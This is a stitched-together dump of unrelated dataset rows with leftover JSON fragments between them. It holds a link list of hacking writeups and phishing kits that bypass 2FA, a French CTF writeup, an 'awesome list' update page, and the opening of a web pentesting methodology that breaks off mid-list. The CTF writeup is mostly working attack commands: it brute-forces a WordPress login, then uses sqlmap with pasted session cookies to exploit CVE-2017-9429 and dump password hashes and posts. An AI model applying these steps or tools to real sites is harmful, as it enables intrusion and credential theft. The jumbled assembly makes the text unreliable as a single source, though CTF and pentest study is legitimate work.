\n\n\n\n-2307-exploiting-second-order-blind-sql-injection:\n\n\nhttps://medium.com/bugbountywriteup/exploiting-second-order-blind-sql-injection-689e98f04daa\n\n\n\n\n-2308-hunting-on-the-go-install-nethunter-on-unsupported-devices:\n\n\n\nhttps://medium.com/bugbountywriteup/hunting-on-the-go-install-nethunter-on-unsupported-devices-dd01a4f30b6a\n\n\n\n\n-2309-$10,000 for a vulnerability that doesn’t exist:\n\nhttps://medium.com/@valeriyshevchenko/10-000-for-a-vulnerability-that-doesnt-exist-9dbc63684e94\n\n\n\n-2310-Finding bugs on Chess.com:\n\n\nhttps://medium.com/bugbountywriteup/finding-bugs-on-chess-com-739a71fbdb31\n\n\n\n-2311-Each and every request make sense:\n\n\nhttps://akshartank.medium.com/each-and-every-request-make-sense-4572b3205382\n\n\n\n-2312-Exploiting Max. Character Limitation:\n\n\nhttps://orthonviper.medium.com/exploiting-max-character-limitation-cde982545019\n\n\n\n-2313-API based IDOR to leaking Private IP address of 6000 businesses:\n\n\nhttps://rafi-ahamed.medium.com/api-based-idor-to-leaking-private-ip-address-of-6000-businesses-6bc085ac6a6f\n\n\n\n-2314-Facebook bug Bounty -Finding the hidden members of the Vivek ps private events:\n\n\n\nhttps://vivekps143.medium.com/facebook-bug-bounty-finding-the-hidden-members-of-the-private-events-977dc1784ff9\n\n\n\n\n-2315-IoT Vulnerability Assessment of the Irish IP Address Space:\n\n\nhttps://f5.com/labs/articles/threat-intelligence/iot-vulnerability-assessment-of-the-irish-ip-address-space\n\n\n\n-2316-Facebook bug bounty (500 USD) :A blocked fundraiser organizer would be unable to view or remove themselves from the fundraiser\n\n\n\nhttps://medium.com/bugbountywriteup/facebook-bug-bounty-500-usd-a-blocked-fundraiser-organizer-would-be-unable-to-view-or-remove-5da9f86d2fa0\n\n\n-2317-This is how I was able to view anyone’s private email and birthday on Instagram:\n\n\nhttps://saugatpokharel.medium.com/this-is-how-i-was-able-to-view-anyones-private-email-and-birthday-on-instagram-1469f44b842b\n\n\n\n-2138-My Bug Bounty Journey and My First Critical Bug — Time Based Blind SQL Injection:\n\n\nhttps://marxchryz.medium.com/my-bug-bounty-journey-and-my-first-critical-bug-time-based-blind-sql-injection-aa91d8276e41\n\n\n\n-2139-JavaScript analysis leading to Admin portal access:\n\n\nhttps://rikeshbaniyaaa.medium.com/javascript-analysis-leading-to-admin-portal-access-ea30f8328c8e\n\n\n\n\n-2140-SCADA hacker's toolset:\n\n\nhttps://scadahacker.com/tools.html\n\n\n\n-2141-red team phishing:\n\nhttps://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki#phishing-setup \n\n\n\n-2142-Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies:\n\n\nhttps://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610\n\n\n\n-2143-Stored XSS in icloud.com:\n\n\nhttps://vbharad.medium.com/stored-xss-in-icloud-com-5000-998b8c4b2075\n\n\n\n-2144-20 Common Tools & Techniques Used by macOS Threat Actors & Malware:\n\n\n\nhttps://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\n\n\n\n-2145-Error-Based SQL Injection on a WordPress website and extract more than 150k user details:\n\n\n\nhttps://ynoof.medium.com/error-based-sql-injection-on-a-wordpress-website-and-extract-more-than-150k-user-details-f65f987c2cc0\n\n\n\n-2146-Scope Based Recon Methodology: Exploring Tactics for Smart Recon:\n\n\n\nhttps://blog.cobalt.io/scope-based-recon-smart-recon-tactics-7e72d590eae5 \n\n\n\n-2147-Hail Frida!! The Universal SSL pinning bypass for Android applications:\n\n\n\nhttps://medium.com/@ved_wayal/hail-frida-the-universal-ssl-pinning-bypass-for-android-e9e1d733d29\n\n\n-2148-Common Tools & Techniques Used By Threat Actors and Malware — Part I :\n\n\nhttps://infosecwriteups.com/common-tools-techniques-used-by-threat-actors-and-malware-part-i-deb05b664879\n\n\n\n\n-2149-Common Tools & Techniques Used By Threat Actors and Malware — Part II:\n\n\n\n\nhttps://nasbench.medium.com/common-tools-techniques-used-by-threat-actors-and-malware-part-ii-c2e65cd6b084\n\n\n-2150-Tools designed to automate phishing attacks that are intended to bypass 2FA:\n\nevilginx2: https://lnkd.in/emMu_mN\n\nModlishka: https://lnkd.in/gvGc-kZ\n\nKoiPhish: https://lnkd.in/dwzavJr\n\nReelPhish https://lnkd.in/gjs_aC8\n\nCredSniper:https://lnkd.in/g-jzK4y\n\nMuraena:https://lnkd.in/d2M53cs\n\n-2151-Digital Forensic Tools\n\n\nhttps://github.com/ivbeg/awesome-forensicstools/\n\n\n\n-2152-Netcat Cheat Sheet:\n\n\n\nhttps://www.linkedin.com/posts/ammaramer_netcat-cheat-sheet-1-banner-grabbing-activity-6780201567527165953-bEbb\n\n\n\n-2153-Web App Hacking Methodology:\n\n\n\nhttps://twitter.com/cry__pto/status/1374625813404999686\n\n\n\n-2154-Penetration Testing MindMap:\n\n\nhttps://twitter.com/cry__pto/status/1375170618501562368\n\n\n\n-2155-Hacking Concept and Fundamentals:\n\n\n\nhttps://twitter.com/cry__pto/status/1376615352466046976\n\n\n-2156-Social Media Osint Tools:\n\n\n\nhttps://twitter.com/cry__pto/status/1382323944833875970\n\n\n"}}},{"rowIdx":317,"cells":{"text":{"kind":"string","value":"**Web - The News Hacker - 150pts**\n\nEnoncé :\n```\nOnly admin can see the flag :)\nctf.sharif.edu:8082\nHint: Weak password!\n```\n\n**Résolution :**\n\nLe site est un wordpress :\n\n![Alt](img/wordpress.png \"Accueil\")\n\nOn commence par le scanner pour identifier les différentes versions des plugins et lister les utilisateurs.\n\n```BASH\nwpscan --url http://ctf.sharif.edu:8082 --enumerate u\n```\n\n**Résultat :**\n```\nDeux utilisateurs sont présent sur le système :\n +----+-----------+-----------+\n | Id | Login | Name |\n +----+-----------+-----------+\n | 1 | admin | admin |\n | 2 | organizer | organizer |\n +----+-----------+-----------+\n\n ```\nUn plugin est vulnérable à une injection SQL authentifié :\n\n```\n[!] Title: Event List <= 0.7.8 - Authenticated SQL Injection\n Reference: https://wpvulndb.com/vulnerabilities/8846\n Reference: https://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/\n Reference: https://plugins.trac.wordpress.org/changeset/1676971/event-list\n Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9429\n[i] Fixed in: 0.7.9\n\n```\n\n\nOn bruteforce l'accès à l'administration du wordpress via la page **wp-login.php** avec burp et le dictionnaire rockyou\n\n\n![Alt](img/burp.png \"Bruteforce\")\n\n\nOn trouve le couple d'identifiant : organizer / password\n\nOn se connecte grâce aux identitifants \n\n![Alt](img/admin.png \"Admin page\")\n\nNous avons maintenant un cookie de session valide pour exploiter l'injection sql en mode authentifié : [CVE-2017-9429](https://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/)\n\nAvec SQLMAP on injecte sur le paramètre **id**:\n```BASH\nsqlmap -u \"http://ctf.sharif.edu:8082/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(2)\" --cookie=\"wordpress_0a035233da76ab47b383406952116587=organizer%7C1517739757%7CBvi9HeOuVUVjGtcTlFxeK0w6ikHvbjQ63cH4No4fKvt%7Cc2da9849c840a893d0cf33bf38bd75a9a7af23367151b471e912be06963bb21b; csrftoken=gMHcyH05di9Nbae4Nob9iz8jXKN7twztLs2V0Zl55nC4mDQJEoEBxFf1ClV1cX5O; sessionid=h7xiiydxhmcqd3u9vij4p1c75fwaiis1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_0a035233da76ab47b383406952116587=organizer%7C1517739757%7CBvi9HeOuVUVjGtcTlFxeK0w6ikHvbjQ63cH4No4fKvt%7Cabf11d732008c12922d0e7101ddcf906203f47813221521c84eb51bdf1180e64; wp-settings-2=libraryContent%3Dupload%26mfold%3Do%26editor%3Dtinymce%26uploader%3D1; wp-settings-time-2=1517567162\" -p id\n```\n\nL'injection fonctionne, il ne reste plus qu'à afficher le contenu de la base de données désirée.\n\nLa première idée à été de dumper le mot de passe du compte : admin\n\n```BASH\nsqlmap -u \"http://ctf.sharif.edu:8082/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(2)\" --cookie=\"wordpress_0a035233da76ab47b383406952116587=organizer%7C1517739757%7CBvi9HeOuVUVjGtcTlFxeK0w6ikHvbjQ63cH4No4fKvt%7Cc2da9849c840a893d0cf33bf38bd75a9a7af23367151b471e912be06963bb21b; csrftoken=gMHcyH05di9Nbae4Nob9iz8jXKN7twztLs2V0Zl55nC4mDQJEoEBxFf1ClV1cX5O; sessionid=h7xiiydxhmcqd3u9vij4p1c75fwaiis1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_0a035233da76ab47b383406952116587=organizer%7C1517739757%7CBvi9HeOuVUVjGtcTlFxeK0w6ikHvbjQ63cH4No4fKvt%7Cabf11d732008c12922d0e7101ddcf906203f47813221521c84eb51bdf1180e64; wp-settings-2=libraryContent%3Dupload%26mfold%3Do%26editor%3Dtinymce%26uploader%3D1; wp-settings-time-2=1517567162\" -p id -D wp_blog -T wp_users --dump\n\n\nDatabase: wp_blog\nTable: wp_users\n[2 entries]\n+----+----------+------------------------------------+------------+-------------------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+\n| ID | user_url | user_pass | user_login | user_email | user_status | display_name | user_nicename | user_registered | user_activation_key |\n+----+----------+------------------------------------+------------+-------------------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+\n| 1 | | $P$BlswVddCYusVLzt8kbJ2IgtYAzjfFV. | admin | info@besthackers.com | 0 | admin | admin | 2018-01-01 07:38:36 | |\n| 2 | | $P$ByyRxRMg.AIWvtbM1Jf3A0Obt/oEJy1 | organizer | organizer@sharifctf.com | 0 | organizer | organizer | 2018-01-08 04:16:36 | 1515384996:$P$B8XHeMJAc23PiQ.TKcINv40EoS4jUV1 |\n+----+----------+------------------------------------+------------+-------------------------+-------------+--------------+---------------+--------------------\n\n```\nAprès une heure de bruteforce offline avec hashcat le mot de passe n'a pas été trouvé.\n\nOn dump alors tous les posts du wordpress en espérant en trouver un de caché.\n\n```BASH\nsqlmap -u \"http://ctf.sharif.edu:8082/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(2)\" --cookie=\"wordpress_0a035233da76ab47b383406952116587=organizer%7C1517745041%7CaFwFCjTZRnFNkPPS2tgadihYPOnZegBYj4uGZLE1d4h%7C3fc24876b5521be0e1075ce103b2f76d4d044237e9f5682d978e7a281e313f34; csrftoken=gMHcyH05di9Nbae4Nob9iz8jXKN7twztLs2V0Zl55nC4mDQJEoEBxFf1ClV1cX5O; sessionid=h7xiiydxhmcqd3u9vij4p1c75fwaiis1; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_0a035233da76ab47b383406952116587=organizer%7C1517745041%7CaFwFCjTZRnFNkPPS2tgadihYPOnZegBYj4uGZLE1d4h%7C8d85976e7e3fe45466237298692e0a71ef640c92b24fc99e1f7c6b2c771bc251; wp-settings-2=libraryContent%3Dbrowse%26mfold%3Do%26editor%3Dhtml%26uploader%3D1; wp-settings-time-2=1517572245; XSRF-TOKEN=eyJpdiI6ImpzTE9IT01LWEZhMVdIY3A0NURKTVE9PSIsInZhbHVlIjoiRG1qZVkyTTkxU2VsMlJJNzFFbiswbkVEU2dPZzYzNEZidHIwVkE5QnVQZnJ3XC9pcHpIUnJDOE9ZTCtFMUhJWm52WnBTM2lUdTNqRGlNNXhqSk9IRHVnPT0iLCJtYWMiOiIyM2U0M2I2NGUyYThlODZkMjE5ZGM0MTFjNWM5NzczNmVkOGE4ZjUyNjBiMjg5MWY1ZjNhYTczMzFlOTc3N2IxIn0%3D; laravel_session=eyJpdiI6IlRodmZ3YUc5K2pHSzJkUmtBSWwzMUE9PSIsInZhbHVlIjoibkhXXC9mQ2RRMWFkWkpEc0FYdk5qVHhZVlZZSGpaNFdyWU1RMStwSzdHU0U3RkJua3RMM1l4bHFJbXB3Zzd5NW44UUJ4U3E0YnRMcWlJb0Rzd21oYmlBPT0iLCJtYWMiOiI3ZWVlMGYyYWIyMDgxOWFkYjZjN2Y0YzNhZDAyZTdhNDMzMWM1M2EzMTE1ZjRhN2M0YjM2OWM0ZDU0YzI5MGQ5In0%3\" -p id -D wp_blog -T wp_posts --dump\n\n\n\n[13:22:35] [INFO] retrieved: \"25\",\"0\",\"open\",\"http://10.0.3.189/?p=25\",\"0\",\"open\",\"\",\"1\",\"Flag is SharifCTF{e7134abea7438e937b87608eab0d979c}\",\"\",\"2018-01-08 04:14:21\",\"2018-01-08 04:14:21\",\"\",\"\",\"2018-01-08 10:5...\n```\n\n\n\nBy team Beers4Flags\n\n\n```\n ________\n| |\n| #BFF |\n|________|\n _.._,_|,_\n ( | )\n ]~,\"-.-~~[\n .=] Beers ([\n | ]) 4 ([\n '=]) Flags [\n |:: ' |\n ~~----~~\n```\n"}}},{"rowIdx":318,"cells":{"text":{"kind":"string","value":"# Awesome List Updates on Oct 12, 2017\n\n11 awesome lists updated today.\n\n[🏠 Home](/README.md) · [🔍 Search](https://www.trackawesomelist.com/search/) · [🔥 Feed](https://www.trackawesomelist.com/rss.xml) · [📮 Subscribe](https://trackawesomelist.us17.list-manage.com/subscribe?u=d2f0117aa829c83a63ec63c2f&id=36a103854c) · [❤️ Sponsor](https://github.com/sponsors/theowenyoung)\n\n\n\n## [1. Awesome Idris](/content/joaomilho/awesome-idris/README.md)\n\n### Contents / Books\n\n* [Type Driven Development With Idris](https://www.manning.com/books/type-driven-development-with-idris) - Most important book published so far.\n\n### Contents / Presentations\n\n* [Idris: General Purpose Programming with Dependent Types](https://www.youtube.com/watch?v=vkIlW797JN8) - Presentation by Edwin Brady, Idris' creator.\n\n### Contents / Projects\n\n* [GitHub's trending Idris repos](https://github.com/trending/idris)\n* [iridium (⭐201)](https://github.com/puffnfresh/iridium) - xmonad with the X11 abstracted and configured with Idris.\n* [lightyear (⭐235)](https://github.com/ziman/lightyear) - Parser combinators for Idris.\n* [quantities (⭐151)](https://github.com/timjb/quantities) Type-safe physical computations and unit conversions in Idris.\n* [idris-type-providers (⭐84)](https://github.com/david-christiansen/idris-type-providers) - Type provider library for Idris.\n* [IdrisScript (⭐88)](https://github.com/idris-hackers/IdrisScript) - FFI Bindings to interact with the unsafe world of JavaScript.\n* [idris-containers (⭐94)](https://github.com/jfdm/idris-containers) - Various data structures for use in the Idris Language.\n* [IdrisSqlite (⭐39)](https://github.com/david-christiansen/IdrisSqlite) - Effectful bindings for SQLite.\n* [idris-http (⭐39)](https://github.com/uwap/idris-http) - HTTP library for Idris.\n* [RingIdris (⭐20)](https://github.com/FranckS/RingIdris) - Ring solver for Idris.\n* [specdris (⭐57)](https://github.com/pheymann/specdris) - Test framework for Idris.\n* [idris-config (⭐19)](https://github.com/jfdm/idris-config) - Parsers for various configuration files written in Idris.\n* [probability (⭐32)](https://github.com/BlackBrane/probability) - Probabilistic computation in Idris.\n* [idris-protobuf (⭐28)](https://github.com/google/idris-protobuf) - Partial implementation of Protocol Buffers in Idris.\n* [idris-free (⭐25)](https://github.com/idris-hackers/idris-free) - Free Monads and useful constructions to work with them.\n\n### Contents / Backends\n\n* [idris-jvm (⭐378)](https://github.com/mmhelloworld/idris-jvm) - JVM bytecode backend for Idris.\n* [idris-llvm (⭐77)](https://github.com/idris-hackers/idris-llvm) - LLVM backend.\n* [idris-erlang (⭐190)](https://github.com/lenary/idris-erlang) - Erlang backend.\n* [idris-malfunction (⭐80)](https://github.com/stedolan/idris-malfunction) - Experimental Malfunction (OCaml internal representation) backend.\n\n### Contents / Community\n\n* [GitHub organization](https://github.com/idris-hackers)\n\n## [2. Awesome Deep Learning Resources](/content/guillaume-chevalier/Awesome-Deep-Learning-Resources/README.md)\n\n### Papers / Convolutional Neural Networks\n\n* [Densely Connected Convolutional Networks](https://arxiv.org/pdf/1608.06993.pdf) - Best Paper Award at CVPR 2017, yielding improvements on state-of-the-art performances on CIFAR-10, CIFAR-100 and SVHN datasets, this new neural network architecture is named DenseNet.\n\n## [3. Awesome Ddd](/content/heynickc/awesome-ddd/README.md)\n\n### Books\n\n* [Writing Great Specifications](https://www.manning.com/books/writing-great-specifications) - Writing Great Specifications is an example-rich tutorial that teaches you how to write good Gherkin specification documents that take advantage of Specification by Example's benefits.\n\n## [4. Awesome Ctf](/content/apsdehal/awesome-ctf/README.md)\n\n### Wargames\n\n* [Hack The Box](https://www.hackthebox.eu) - Weekly CTFs for all types of security enthusiasts.\n\n## [5. Awesome Android](/content/JStumpp/awesome-android/README.md)\n\n### GUI / Video\n\n* [VideoPlayView (⭐90)](https://github.com/MarcinMoskala/VideoPlayView) - Custom Android view with video player, play/stop, loader and placeholder image.\n\n## [6. Awesome Swift](/content/matteocrippa/awesome-swift/README.md)\n\n### Dependency Injection\n\n* [Corridor (⭐60)](https://github.com/symentis/Corridor) - A Coreader-like Dependency Injection μFramework.\n\n### Utility / Barcode\n\n* [Closures (⭐1.7k)](https://github.com/vhesener/Closures) - Swifty closures for UIKit and Foundation.\n\n## [7. Awesome Vue](/content/vuejs/awesome-vue/README.md)\n\n### Resources / Community\n\n* [VueJS Thailand - Facebook Group](https://www.facebook.com/groups/VuejsThailand/)\n\n### Resources / Tutorials\n\n* [Async in VueJS part 1](https://medium.com/js-dojo/async-in-vue-js-part-1-28d96f751a2e)\n* [Async in VueJS part 2](https://medium.com/js-dojo/async-in-vuejs-part-2-45e81c836e38)\n\n## [8. Awesome Micro Npm Packages](/content/parro-it/awesome-micro-npm-packages/README.md)\n\n### Modules / Function\n\n* [throttle-debounce (⭐886)](https://github.com/niksy/throttle-debounce) - Throttle/debounce your functions.\n\n## [9. Awesome Dotnet Core](/content/thangchung/awesome-dotnet-core/README.md)\n\n### Articles / Workflow\n\n* Basic knowledge\n * [Microsoft architectural overview of comprehensive BikeSharing360 suite of demo apps with related videos](https://blogs.msdn.microsoft.com/visualstudio/2016/12/14/connectdemos-2016-bikesharing360-on-github/)\n * [Porting a .NET Framework library to .NET Core](https://www.codeproject.com/Articles/1190475/Porting-a-NET-Framework-library-to-NET-Core)\n * [The 68 things the CLR does before executing a single line of your code](http://mattwarren.org/2017/02/07/The-68-things-the-CLR-does-before-executing-a-single-line-of-your-code/)\n * The comparison between .NET Core and Nodejs at [here](https://manuel-rauber.com/2016/03/07/node-js-asp-net-core-1-0-a-usage-comparison/), [here](https://gist.github.com/ilyaigpetrov/f6df3e6f825ae1b5c7e2) and [here (⭐46)](https://github.com/thinktecture/nodejs-aspnetcore-webapi)\n * [Understanding ASP.NET Core Initialization](http://developer.telerik.com/featured/understanding-asp-net-core-initialization/)\n * [Why you should join .NET Core and ASP.NET Core train](https://codingblast.com/why-you-should-join-asp-net-core/)\n\n## [10. Awesome Open Source Supporters](/content/zachflower/awesome-open-source-supporters/README.md)\n\n### Exception Reporting\n\n* [BugSnag](https://www.bugsnag.com/) `requires-approval` - Exception tracking and reporting.\n\n## [11. Awesome No Login Web Apps](/content/aviaryan/awesome-no-login-web-apps/README.md)\n\n### Miscellaneous / Others\n\n* [AlarmDJ](https://alarmdj.com) - Online Alarm clock, use MP3 files and YouTube videos as alarm.\n\n---\n\n- Prev: [Oct 13, 2017](/content/2017/10/13/README.md)\n- Next: [Oct 11, 2017](/content/2017/10/11/README.md)"}}},{"rowIdx":319,"cells":{"text":{"kind":"string","value":"# 80,443 - Pentesting Web Methodology\n\nIf you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**PEASS & HackTricks telegram group here**](https://t.me/peass)**, or follow me on Twitter 🐦**[**@carlospolopm**](https://twitter.com/carlospolopm). \n**If you want to** share some tricks with the community **you can also submit** pull requests **to** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) **that will be reflected in this book. \nDon't forget to** give ⭐ on the **github** to motivate me to continue developing this book.\n\n## Basic Info\n\nThe web service is the most **common and extensive service** and a lot of **different types of vulnerabilities** exists.\n\n**Default port:** 80 \\(HTTP\\), 443\\(HTTPS\\)\n\n```bash\nPORT STATE SERVICE\n80/tcp open http\n443/tcp open ssl/https\n```\n\n```bash\nnc -v domain.com 80 # GET / HTTP/1.0\nopenssl s_client -connect domain.com:443 # GET / HTTP/1.0\n```\n\n## Web API Guidance\n\n{% page-ref page=\"web-api-pentesting.md\" %}\n\n## Methodology summary\n\n> In this methodology we are going to suppose that you are going to a attack a domain \\(or subdomain\\) and only that. So, you should apply this methodology to each discovered domain, subdomain or IP with undetermined web server inside the scope.\n\n* [ ] Start by **identifying** the **technologies** used by the web server. Look for **tricks** to keep in mind during the rest of the test if you can successfully identify the tech.\n * [ ] Any **known vulnerability** of the version of the technology?\n * [ ] Using any **well known tech**? Any **useful trick** to extract more information?\n * [ ] Any **specialised scanner** to run \\(like wpscan\\)?\n* [ ] Launch **general purposes scanners**. You never know if they are going to find something or if the are going to find some interesting information.\n* [ ] Start with the **initial checks**: **robots**, **sitemap**, **404** error and **SSL/TLS scan** \\(if HTTPS\\).\n* [ ] Start **spidering** the web page: It's time to **find** all the possible **files, folders** and **parameters being used.** Also, check for **special findings**.\n * [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be spidered._\n* [ ] **Directory Brute-Forcing**: Try to brute force all the discovered folders searching for new **files** and **directories**. \n * [ ] _Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._\n* [ ] **Backups checking**: Test if you can find **backups** of **discovered files** appending common backup extensions.\n* [ ] **Brute-Force parameters**: Try to **find hidden parameters**.\n* [ ] Once you have **identified** all the possible **endpoints** accepting **user input**, check for all kind of **vulnerabilities** related to it.\n * [ ] [Follow this checklist](../../pentesting-web/web-vulnerabilities-methodology.md)\n\n## Server Version \\(Vulnerable?\\)\n\n### Identify\n\nCheck if there are **known vulnerabilities** for the server **version** that is running. \nThe **HTTP headers and cookies of the response** could be very useful to **identify** the **technologies** and/or **version** being used. **Nmap scan** can identify the server version, but it could also be useful the tools [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech)or [**https://builtwith.com/**](https://builtwith.com/)**:**\n\n```bash\nwhatweb -a 1 #Stealthy\nwhatweb -a 3 #Aggresive\nwebtech -u \n```\n\nSearch **for** [**vulnerabilities of the web application** **version**](../../search-exploits.md)\n\n**Check if any WAF**\n\n* [**https://github.com/EnableSecurity/wafw00f**](https://github.com/EnableSecurity/wafw00f)\n* [**https://github.com/Ekultek/WhatWaf.git**](https://github.com/Ekultek/WhatWaf.git)\n* [**https://nmap.org/nsedoc/scripts/http-waf-detect.html**](https://nmap.org/nsedoc/scripts/http-waf-detect.html)\n\n### Web tech tricks\n\nSome **tricks** for **finding vulnerabilities** in different well known **technologies** being used:\n\n* [**AEM - Adobe Experience Cloud**](aem-adobe-experience-cloud.md)\n* [**Apache**](apache.md)\n* [**Artifactory**](artifactory-hacking-guide.md)\n* [**Buckets**](buckets/)\n* [**CGI**](cgi.md)\n* [**Drupal**](drupal.md)\n* [**Flask**](flask.md)\n* [**Git**](git.md)\n* [**Golang**](golang.md)\n* [**GraphQL**](graphql.md)\n* [**H2 - Java SQL database**](h2-java-sql-database.md)\n* [**IIS tricks**](iis-internet-information-services.md)\n* [**JBOSS**](jboss.md)\n* [**Jenkins**](jenkins.md)\n* [**Jira**](jira.md)\n* [**Joomla**](joomla.md)\n* [**JSP**](jsp.md)\n* [**Laravel**](laravel.md)\n* [**Moodle**](moodle.md)\n* [**Nginx**](nginx.md)\n* [**PHP \\(php has a lot of interesting tricks that could be exploited\\)**](php-tricks-esp/)\n* [**Python**](python.md)\n* [**Spring Actuators**](spring-actuators.md)\n* [**Symphony**](symphony.md)\n* [**Tomcat**](tomcat.md)\n* [**VMWare**](vmware-esx-vcenter....md)\n* [**Web API Pentesting**](web-api-pentesting.md)\n* [**WebDav**](put-method-webdav.md)\n* [**Werkzeug**](werkzeug.md)\n* [**Wordpress**](wordpress.md)\n* [**Electron Desktop \\(XSS to RCE\\)**](xss-to-rce-electron-desktop-apps.md)\n\n_Take into account that the **same domain** can be using **different technologies** in different **ports**, **folders** and **subdomains**._ \nIf the web application is using any well known **tech/platform listed before** or **any other**, don't forget to **search on the Internet** new tricks \\(and let me know!\\).\n\n## Source Code Review\n\nIf the **source code** of the application is available in **github**, apart of performing by **your own a White box test** of the application there is **some information** that could be **useful** for the current **Black-Box testing**:\n\n* Is there a **Change-log or Readme or Version** file or anything with **version info accessible** via web?\n* How and where are saved the **credentials**? Is there any \\(accessible?\\) **file** with credentials \\(usernames or passwords\\)?\n* Are **passwords** in **plain text**, **encrypted** or which **hashing algorithm** is used?\n* Is it using any **master key** for encrypting something? Which **algorithm** is used?\n* Can you **access any of these files** exploiting some vulnerability?\n* Is there any **interesting information in the github** \\(solved and not solved\\) **issues**? Or in **commit history** \\(maybe some **password introduced inside an old commit**\\)?\n\n{% page-ref page=\"code-review-tools.md\" %}\n\n## Automatic scanners\n\n### General purpose automatic scanners\n\n```bash\nnikto -h \nwhatweb -a 4 \nwapiti -u \nW3af\nzaproxy #You can use an API\nnuclei -t nuclei-templates\n```\n\n### CMS scanners\n\nIf a CMS is used don't forget to **run a scanner**, maybe something juicy is found:\n\n[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat.md)**, Railo, Axis2, Glassfish** \n[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal.md), **Joomla**, **vBulletin** websites for Security issues. \\(GUI\\) \n[**VulnX**](https://github.com/anouarbensaad/vulnx)**: Joomla,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal.md)**, PrestaShop, Opencart \nCMSMap**: [**\\(W\\)ordpress**](wordpress.md)**, \\(J\\)oomla,** [**\\(D\\)rupal**](drupal.md) **or** [**\\(M\\)oodle**](moodle.md) \n[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal.md)**, Joomla,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md)\n\n```bash\ncmsmap [-f W] -F -d \nwpscan --force update -e --url \njoomscan --ec -u \njoomlavs.rb #https://github.com/rastating/joomlavs\n```\n\n> At this point you should already have some information of the web server being used by the client \\(if any data is given\\) and some tricks to keep in mind during the test. If you are lucky you have even found a CMS and run some scanner.\n\n## Step-by-step Web Application Discovery\n\n> From this point we are going to start interacting with the web application.\n\n### Initial checks\n\n#### Default pages with interesting info:\n\n* /robots.txt\n* /sitemap.xml\n* /crossdomain.xml\n* /clientaccesspolicy.xml\n* /.well-known/\n* Check also comments in the main and secondary pages.\n\n#### Forcing errors\n\nWeb servers may **behave unexpectedly** when weird data is sent to them. This may open **vulnerabilities** or **disclosure sensitive information**.\n\n* Access **fake pages** like /whatever\\_fake.php \\(.aspx,.html,.etc\\)\n* **Add \"\\[\\]\", \"\\]\\]\", and \"\\[\\[\"** in **cookie values** and **parameter** values to create errors\n* Generate error by giving input as **`/~randomthing/%s`** at the **end** of **URL**\n* Try **different HTTP Verbs** like PATCH, DEBUG or wrong like FAKE\n\n#### Check if you can upload files \\([PUT verb, WebDav](put-method-webdav.md)\\)\n\nIf you find that **WebDav** is **enabled** but you don't have enough permissions for **uploading files** in the root folder try to:\n\n* **Brute Force** credentials\n* **Upload files** via WebDav to the **rest** of **found folders** inside the web page. You may have permissions to upload files in other folders.\n\n#### SSL/TLS vulnerabilites\n\n* If the application **isn't forcing the user of HTTPS** in any part, then it's **vulnerable to MitM**\n* If the application is **sending sensitive data \\(passwords\\) using HTTP**. Then it's a high vulnerability.\n\nUse [**testssl.sh**](https://github.com/drwetter/testssl.sh) to checks for **vulnerabilities** \\(In Bug Bounty programs probably these kind of vulnerabilities won't be accepted\\) and use [**a2sv** ](https://github.com/hahwul/a2sv)to recheck the vulnerabilities:\n\n```bash\n./testssl.sh [--htmlfile] 10.10.10.10:443\n#Use the --htmlfile to save the output inside an htmlfile also\n\n## You can also use other tools, by testssl.sh at this momment is the best one (I think)\nsslscan \nsslyze --regular \n```\n\nInformation about SSL/TLS vulnerabilities:\n\n* [https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/](https://www.gracefulsecurity.com/tls-ssl-vulnerabilities/) \n* [https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/](https://www.acunetix.com/blog/articles/tls-vulnerabilities-attacks-final-part/)\n\n### Spidering\n\nLaunch some kind of **spider** inside the web. The goal of the spider is to **find as much paths as possible** from the tested application. Therefore, web crawling and external sources should be used to find as much valid paths as possible.\n\n* [**gospider**](https://github.com/jaeles-project/gospider) \\(go\\): HTML spider, LinkFinder in JS files and external sources \\(Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com\\).\n* [**hakrawler**](https://github.com/hakluke/hakrawler) \\(go\\): HML spider, with LinkFider for JS files and Archive.org as external source.\n* [**dirhunt**](https://github.com/Nekmo/dirhunt) \\(python\\): HTML spider, also indicates \"juicy files\".\n* [**evine** ](https://github.com/saeeddhqan/evine)\\(go\\): Interactive CLI HTML spider. It also searches in Archive.org\n* [**meg**](https://github.com/tomnomnom/meg) \\(go\\): This tool isn't a spider but it can be useful. You can just indicate a file with hosts and a file with paths and meg will fetch each path on each host and save the response.\n* [**urlgrab**](https://github.com/IAmStoxe/urlgrab) \\(go\\): HTML spider with JS rendering capabilities. However, it looks like it's unmaintained, the precompiled version is old and the current code doesn't compile\n* [**gau**](https://github.com/lc/gau) go\\): HTML spider that uses external providers \\(wayback, otx, commoncrawl\\)\n* 